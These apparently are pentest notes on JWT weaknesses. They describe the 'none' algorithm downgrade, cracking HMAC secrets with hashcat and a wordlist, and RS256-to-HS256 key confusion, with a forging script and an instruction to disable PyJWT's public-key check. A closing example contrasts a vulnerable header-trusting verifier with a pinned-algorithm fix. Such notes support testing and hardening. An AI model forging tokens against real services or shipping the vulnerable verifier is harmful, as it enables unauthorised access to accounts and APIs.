Generic Information

JWT stands for JSON Web Tokens and is a type of token that is used for authorisation/authentication to various websites and APIs.

In order to use it against an API you will need to send the token in an HTTP header, as below, in your curl request.

Authorization: Bearer **JWT_value**

You could use something like https://jwt.io to decode the token, review its header and payload, and experiment with tampering with the content if the website is vulnerable.

Security

JWT secures the token with a signature, which can be symmetric (an HMAC such as HS256) or asymmetric (such as RS256), but there is also the chance of downgrading the signature algorithm to ‘none’.

There is also an encrypted alternative, called JWE (JSON Web Encryption).

Vulnerabilities

  1. Downgrading the signature algorithm to ‘none’: use CyberChef for this one, and don’t forget to remove the signature.
  2. Cracking the HMAC secret: hashcat -m 16500 -a 0 jwt.txt jwt.secrets.list (mode 16500 is hashcat’s JWT mode); an example wordlist is https://raw.githubusercontent.com/wallarm/jwt-secrets/master/jwt.secrets.list
  3. Public key used as the HMAC secret (RS256 to HS256 key confusion), detailed below.

Steps: create a directory, create a virtual env, activate it, install PyJWT.

mkdir jwt
cd jwt
python3 -m venv venv
source venv/bin/activate   # the venv was created in ./venv, so the activate script lives there
pip install pyjwt
touch script.py   # the content of script.py is below

In the case of an RSA key, PyJWT refuses to accept a public key as an HMAC secret, so you will need to comment out the lines around 258 concerning is_ssh_key in /usr/lib/python3/dist-packages/jwt/algorithms.py.

import jwt

# Paste the target's RSA public key (PEM text) here; it is used as the HMAC secret below
public_key = "ADD_KEY_HERE"

payload = {
    'username': 'user',
    'admin': 0
}

# Sign with HS256, passing the public key as the shared secret (key confusion)
access_token = jwt.encode(payload, public_key, algorithm="HS256")
print(access_token)
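To see why the ‘none’ downgrade and the key-confusion trick above work, and what the server-side fix looks like, here is an added stdlib-only example (not from the original notes or PyJWT): a verifier that obeys the token’s own alg header next to one that pins the algorithm from server config. The secret and the “public key” string are constructed test values; RS256 itself is not implemented, because the point is that the pinned check rejects a swapped algorithm before any signature logic runs.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def make_token(payload: dict, key: bytes, alg: str = "HS256") -> str:
    """Test-vector builder: HMAC-SHA256 token, or the unsigned 'none' shape with an empty signature."""
    header = b64url_encode(json.dumps({"alg": alg, "typ": "JWT"}).encode())
    body = b64url_encode(json.dumps(payload).encode())
    if alg == "none":
        return f"{header}.{body}."
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"

def hs256_valid(h: str, b: str, s: str, key: bytes) -> bool:
    expected = hmac.new(key, f"{h}.{b}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(s))

def verify_trusting_header(token: str, key: bytes) -> Optional[dict]:
    """VULNERABLE: the token's own header picks the algorithm, and one key serves every branch."""
    h, b, s = token.split(".")
    alg = json.loads(b64url_decode(h)).get("alg")
    if alg == "none" or (alg == "HS256" and hs256_valid(h, b, s, key)):
        return json.loads(b64url_decode(b))
    return None  # an RS256 branch would sit here; the stdlib has no RSA, so it is omitted

def verify_pinned(token: str, expected_alg: str, key: bytes) -> Optional[dict]:
    """Hardened: server config pins the algorithm; the header 'alg' is compared, never obeyed."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    h, b, s = parts
    if json.loads(b64url_decode(h)).get("alg") != expected_alg:
        return None  # rejects 'none' (any casing) and an RS256->HS256 swap in one check
    if expected_alg != "HS256":
        raise NotImplementedError("only HS256 is implemented here; use a JWT library for RS256")
    return json.loads(b64url_decode(b)) if hs256_valid(h, b, s, key) else None
```

The same pinning is what PyJWT’s mandatory algorithms= argument to jwt.decode is for: a server verifying RS256 tokens should pass algorithms=["RS256"] only, never a list that also contains HS256.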